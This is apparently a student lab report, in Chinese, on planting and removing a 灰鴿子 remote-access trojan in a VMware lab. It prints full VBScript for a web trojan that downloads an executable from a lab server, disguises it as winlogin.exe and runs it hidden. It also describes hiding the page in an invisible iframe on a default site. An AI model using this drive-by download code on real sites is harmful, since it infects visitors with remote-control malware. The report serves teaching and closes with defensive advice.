一、 實驗環境
VMware Workstation
二、 實驗內容
- 木馬生成與植入
- 利用木馬實現遠程控制
- 木馬的刪除
三、 實驗過程
(一) 木馬生成與植入
1. 生成網頁木馬
主機A通過Internet信息服務(IIS)管理器啟動“木馬網站”的步驟如下:
- 開始->程序->管理工具->Internet信息服務(IIS)管理器
- 在“木馬網站”上右鍵->啟動
「問題1」:為什么啟動木馬網站?
「答」:為了保證我們可以發布修改過的木馬網頁,使得被攻擊方訪問默認網頁時,木馬網站處於工作狀態。
「問題2」:在服務器配置時,有多少同學將配置里的不同屬性頁進行了查看?除了“自動上線設置”屬性頁,還有哪些屬性頁?
「答」:配置服務器時的界面如圖1所示,可見配置里包含“自動上線設置、安裝選項、啟動項設置、代理服務、高級選項、插件功能”這6個屬性頁,其中啟動項設置如圖2所示,這里指定了顯示名稱和服務名稱為“Windows XP Vista”,所以在后續操作中,被掛馬的主機B在查看監控器工具時,會發現名為“Windows XP Vista”的服務名稱和顯示名稱。
「問題3」:為什么在“保存路徑”文本框中輸入“D:\Work\IIS\Server_Setup.exe”?換為另一個路徑可以嗎?
「答」:因為D:\Work\IIS\為“木馬網站”的網站空間目錄,不可以更改,這和我們第一步啟動木馬網站是息息相關的。
「問題4」:對網頁木馬源碼進行閱讀分析。
「答」:網頁木馬的源碼Trojan.htm如下:
<html>
<script language="VBScript">
<!-- 首先動態創建對象組件,並聲明組件的clsid -->
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
<!-- 創建XMLHTTP對象,用來完成從數據包到Request對象的轉換以及發送任務 -->
Set xh = df.createObject("Microsoft.XMLHTTP","")
<!-- 創建Adodb.Stream對象,提供存取二進制數據或文本流,實現對流的讀、寫等操作 -->
Set ados = df.createObject("Adodb.Stream","")
ados.type = 1
<!-- 使用HTTP GET初始化HTTP請求 -->
url = "http://172.16.0.98:9090/Server_Setup.exe"
xh.Open "GET", url, False
<!-- 發送HTTP請求,並獲取HTTP響應 -->
xh.Send
<!-- 創建Scripting.FileSystem對象,提供對計算機文件系統進行訪問 -->
Set fs = df.createObject("Scripting.FileSystemObject","")
<!-- 獲取目標路徑,0為windows目錄;1為system目錄;2為用戶臨時目錄 -->
Set tmpdir = fs.GetSpecialFolder(2)
<!-- 向目標路徑后添加文件名稱winlogin.exe,此名稱與系統文件名相似,不易被察覺 -->
fname1="winlogin.exe"
fname1= fs.BuildPath(tmpdir,fname1)
<!-- 打開Adodb.Stream對象,將服務器返回的響應數據寫入對象,將對象內容保存至目標文件-->
ados.Open
ados.Write xh.responseBody
ados.SaveToFile fname1,2
<!-- 文件系統操作完成,關閉對象 -->
ados.Close
<!-- 創建Shell對象,調用執行目標文件 -->
Set sl = df.createObject("Shell.Application","")
<!-- 以隱藏方式運行木馬 -->
sl.ShellExecute fname1,"","","open",0
</script>
</html>
其中 Set tmpdir = fs.GetSpecialFolder(2)指定了目標目錄為用戶臨時目錄,fname1="winlogin.exe" fname1= fs.BuildPath(tmpdir,fname1)這兩句指明會在用戶的臨時目錄后添加winlogin.exe文件。
「問題4」:為什么要將Trojan.htm文件保存到“D:\Work\IIS\”目錄下?
「答」:因為D:\Work\IIS\為“木馬網站”的網站空間目錄,這有保存在這個目錄下,才能使得被攻擊端運行木馬網站時能夠執行
Trojan.htm文件中的指令。
2. 完成對默認網站的“掛馬”過程
「問題1」:iframe標簽有什么作用?
「答」:iframe也叫浮動幀標簽,在一個正常網站的主頁上鏈接網頁木馬,它把一個Trojan.htm嵌入index.html頁里實現“畫中畫”的效果。在本實驗中,它為了插入木馬,把框架設置為不可見,主機B訪問index.html時,其實同時打開了不可見的木馬網頁Trojan.htm
「問題2」:為什么使用9090端口?
「答」:9090端口是一個TCP端口,這個端口不是系統默認的端口,屬於自定義的端口。Windows本身沒有用到9090端口。
Webshpere的管理工具端口默認是9090;
3. 木馬的植入
木馬植入后木馬客戶端在灰鴿子遠程控制->文件目錄瀏覽->自動上線主機中可以發現木馬服務端主機B,如圖3所示:
「問題1」:觀察木馬服務器端安裝程序的運行結果與配置服務器時的設置是否一致。
「答」:一致,如服務器配置時的設置,木馬服務器端安裝程序后,如下圖所示:
「問題2」:Hacker.com.cn.ini在前面的過程中哪里設置的?
「答」:木馬客戶端在灰鴿子遠程控制->配置服務器->安裝選項->安裝路徑 中設置了Hacker.com.cn.ini,如下圖所示:
「問題3」:Hacker.com.cn.ini文件是由哪個進程創建的:
「答」:進程ID ** 1172 ** ;
「問題4」:Windows XP Vista服務在前面的過程中哪里設置的?
「答」:木馬客戶端配置服務器->啟動項設置時指定,如下圖所示:
「問題5」:Windows XP vista服務的執行體文件是: Hacker.com.cn.ini
「問題6」:端口8000在前面的過程中哪里設置的?
「問題7」:8000服務遠程地址(控制端)地址: 172.16.0.98
「問題8」:經過對上述監控信息的觀察,你認為在“進程監控”中出現的winlogoin.exe進程(若存在)在整個的木馬植入過程中起到的作用是:
++ 用於定時監測控制端是否存在,發現控制端上線后立即彈出端口主動連接控制端打開的被動端口。 ++
「問題9」:winlogoin.exe在前面的過程中哪里設置的?
「答」:木馬網頁的腳本Trojan.htm文件中設置的。如下圖所示:
(二) 木馬的功能
1. 文件管理
木馬客戶端修改文件名如下圖所示:
在主機B上觀察文件操作的結果。
2. 系統信息查看
3. 進程查看
木馬客戶端查看木馬服務端進程如下圖所示:
木馬服務端本機查看進程如下圖所示:
4. 注冊表管理
木馬客戶端添加了“zjy”注冊表項,如下圖所示:
木馬服務端沒有變化,如下圖所示:
5. Telnet
6.其它命令及控制
木馬客戶端對木馬服務端進行“捕獲屏幕”,如下圖所示:
(三) 木馬的刪除
木馬服務端自動刪除成功,如下圖所示:
木馬客戶端手動刪除如下圖所示:
四、 實驗總結
問題:在主機B訪問 http://主機A IP時,“灰鴿子遠程控制”的“文件目錄瀏覽”樹中未出現主機B的信息
解決:當時把IP地址輸錯了,又等待了一小會兒后運行正常。
五、 思考題
1. 列舉出幾種不同的木馬植入方法。
直接攻擊;電子郵件;文件下載;瀏覽網頁;合並文件
2. 列舉出幾種不同的木馬防范方法。
- 不到不受信任的網站上下載軟件運行
- 不隨便點擊來歷不明郵件所帶的附件
- 及時安裝相應的系統補丁程序
- 為系統選用合適的正版殺毒軟件,並及時升級相關的病毒庫
- 為系統所有的用戶設置合理的用戶口令